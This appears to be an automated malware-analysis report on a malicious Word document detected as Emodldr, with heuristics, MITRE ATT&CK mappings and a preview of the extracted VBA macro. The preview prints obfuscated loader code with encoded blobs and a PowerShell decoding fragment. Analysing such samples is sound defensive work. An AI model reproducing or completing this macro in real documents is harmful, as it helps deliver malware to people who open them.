MALICIOUS
224
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
T1140 Deobfuscate or Obfuscate Malicious Code
The sample is a malicious Office document containing a VBA macro. The macro uses CreateObject and an AutoOpen function, indicating it's designed to execute automatically upon opening. The macro's script attempts to deobfuscate and likely download a second-stage payload, as suggested by the ClamAV detection name 'Emodldr' and the presence of a 'macros.bas' artifact. The specific payload and its destination are not fully discernible due to obfuscation.
Heuristics 8
-
ClamAV: Doc.Malware.Emodldr-10025032-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 25223 bytes |
SHA-256: 7f28f0fef448469ac4593fd0f90342f4b7097241560d720ac7356cd8a58527ff |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
Carved artifact contains 25 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "SGUMkpLwO"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "wsPkwRj"
Function whmrdTP()
On Error Resume Next
Set WwcwwZ = IjDcw
FqwUvu = 8213 + 3324
OModSX = 58869 / mBaphM
OjHQchzj = DkKHRE("ABrrUUADQAOAA2AGMAOQA5ADEAZgA4AGUAYgA3AGYAYwBmADYAOQBhADEAYQAxADcAYgAzAGMAOQAyADgAMgAyAGQAZgBiAGEAMQAzADkAMwAzAGQAMgAyADgANgBhAGUANAA5AGEAOQA2ADkANQBjADgAOQBhAGQAOAA3ADMANgAzADYAYQAzADAAMABhADQAMgA3A3 ", 7, 193)
Set fYbtFM = NEPiMf
Aaiji = 64001 + 30650
SHAiB = 32736 / XAXiOo
Set CBCvhC = CTnjVG
JEShh = 5528 + 40651
lMzcW = 61137 / cRkuQ
MwbOQIHO = DkKHRE("BiSgA0ADIAZQBhAGEAZQA4AGUAMwA0ADMANwBmADQANAAzADcAMAA1ADIANwA4ADkANwA0AGUANwBkAGEAZgBjADMAMQBhADMAMABhADgAZABkCwlwp", 4, 107)
Set wPZlh = AfutMv
KQAVjw = 58722 + 96425
qwFfG = 87552 / VwapwN
Set OIwjF = zzGCP
LpIiP = 91988 + 81730
zNvaL = 68681 / EXGarX
AsRlwpt = DkKHRE("TSTiADIANQAwADEAOAA0ADgANgBmAGQANAA1ADQAZABlAGUAZQA1ADUAYgAwADYAMQA0ADAAZgBkAGQAMgA3ADAAMQAyADgAYgA0AGUAZgA3ADcAiUQX", 4, 109)
Set DHBXI = WZsZO
GjNoI = 62845 + 99565
FAMVX = 42443 / tbAcXr
Set aWEVft = bFpNM
RMFFYr = 34530 + 37051
DQojX = 97619 / PVhGd
HUYlrXttDci = DkKHRE("SDQANQAxAGEAMgBiAGIAOQA0AGEANwA5AGEAMwA2ADcAMAA5ADcANQA1ADAANABlAGEAOQBkAGUAZgA1ADgANAA3ADMANwBlAGYAMQA5ADMAZgBhADcAOQBmADMAOAA5ADIAMQA4AGMAMQA0ADUAZQAzADYAOAAyADQAZAAwADYANwAxADUANAAxADIANQAwAGQANiN1Whu", 2, 196)
Set LBfMI = cVmMIs
FZXIJ = 12772 + 54303
TnhwW = 27912 / pUjFP
Set qizLi = QhKYz
zuiXA = 55021 + 47887
fDLYr = 76432 / iEqJiw
fzrlrrpMrG = DkKHRE("sd.N.GIAYQAxAGUAYwA2AGYAMQA5ADAAMwA1AGIANQA3ADQANQA0ADIAMwA0ADQANAA1ADQAMQA1AGEAOAAwADUAMgAwADYANwBiADAAOAAxADkAYwA4AGUAZgBhADAAOQAXTw", 6, 126)
Set TMckOz = Woziw
uwVQV = 96515 + 93724
mTYTuX = 72848 / TPPQJa
Set fLViI = ZszrLA
IkTFZF = 69486 + 5119
cjLdh = 933 / FSEkU
LbcdSs = DkKHRE("USVNSerVICEs.MArSHal]::SEcureStrinGtOgLObalalLocunIcode( $('76492d1116743f0423413b16050a5345MgB8ADAAbQBPAEgAbQBhADcAawBMAFMANwAxAGUAeAB1AGkAZwBaAGQAawBVAHcAPQA9AHwAMAAyADMAZAASYw", 5, 171)
Set UsSlpR = wEoNU
usMsv = 46893 + 44145
ipWfD = 47367 / sZGPGL
Set WiGWi = GXjwaT
jkuDc = 99801 + 87142
UzjFiS = 75552 / ahqDf
WlopWJM = DkKHRE("B@iGYANwA5ADIAMwBlAGEAYgA4ADMANAAxADAAZQAxADMAMwAzADMAYgBkADYAYwBmADYANgBkADMAYgA1ADcAMAAzADUAYwA3AGYAZgAxAGYANABlAGQAYwAxAtqsP", 4, 120)
Set SwmvCR = zizBK
ZFric = 22177 + 70676
faRzJ = 36771 / JOkPYD
Set wWcIU = toNJtO
jajfK = 53450 + 10244
zUbvnE = 94680 / TDmOE
wzwCsiaqlI = DkKHRE("hUO.QQUkADQAMgA4ADEAZABlADUAMQA0AGQAOQA2ADYAMQA3ADEAMABlAGEAYQBkADMAYwBiADIAZABiADcAMgA2AGQANgAxAGMAMwBkAGMANABmAGMAMwAxADcAMQA0ADMAYgBiADQAYwAzADkAYwA0ADQANQA3ADMAYwAyADYANQAyADMAOQA2AGYAZABmADEAMQA3ADcaj", 8, 196)
Set JwnRMk = SmYDj
hdcwH = 6609 + 95262
CBNjmv = 36723 / FGzCBQ
Set zDLYJL = iqPhw
KSuBD = 81349 + 17280
Phvdj = 57996 / tnMPBX
zhzbpQzCQr = DkKHRE("@TWOABjAGUAZQAyAGYANQAwADgAOQBhAGUAYgA0ADUANgBhADcAMAAxAGUANgBkAGMANgAzADAANgA4ADIANgBhADEAMQAzADkANQA0AGQAMABjADcANAAxAGQAYgA5AGGM", 5, 125)
Set OwRWZl = tYwZt
oJmYpI = 37386 + 66432
Qvdja = 78203 / CSviW
Set fCDpZ = HlbfzZ
qDAXzh = 50725 + 95323
ONwfC = 36024 / uuZfEj
TSwnQYzwTS = DkKHRE("WBJGQAOQBhAGYAMgBiAGMAOQBmADYAZAAwADAANgBmADEAZAAxADAAZgBkADEAMgBlADQRQLko", 4, 66)
Set VXvqfi = wdwjIs
kmLEQO = 76674 + 80459
umouhl = 47129 / oJSfzC
Set WcYrFL = lthvjr
ETTji = 10838 + 50714
NcoowO = 58648 / FQBOUt
FopjzdR = DkKHRE("0I7.,)|.((gv '*mDr*').name[3,11,2]-jOin'')Yvi", 6, 37)
Set bvbbpI = iQPmvE
oLLMc = 28892 + 93212
RMOHt = 52787 / hdnLrr
Set ctlOS = RpfrM
CztrN = 34553 + 44279
pOpHm = 24179 / QtYiz
ZHRGPooFs = DkKHRE("2NPWWZgA3ADYAYwA4ADMANgA3AGUAYgA2ADYAOQAzADAANgA4ADIAZQA1ADMAMwBlAGYAMgAzADgANgBhAGEANQAyADUAYQAwADcAZgAyADAAMgBiAGUAMgA2ADAAZgAxADQANABhAGMAYgBhADIAYwAw@W", 6, 148)
Set jkZYcz = EwIzZ
jNoYm = 82204 + 8475
MNEdcF = 63728 / vHJMH
Set HzOIz = RuiafV
OHFTjQ = 86573 + 75048
hDGYcE = 40343 / MlwHh
HPkp
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.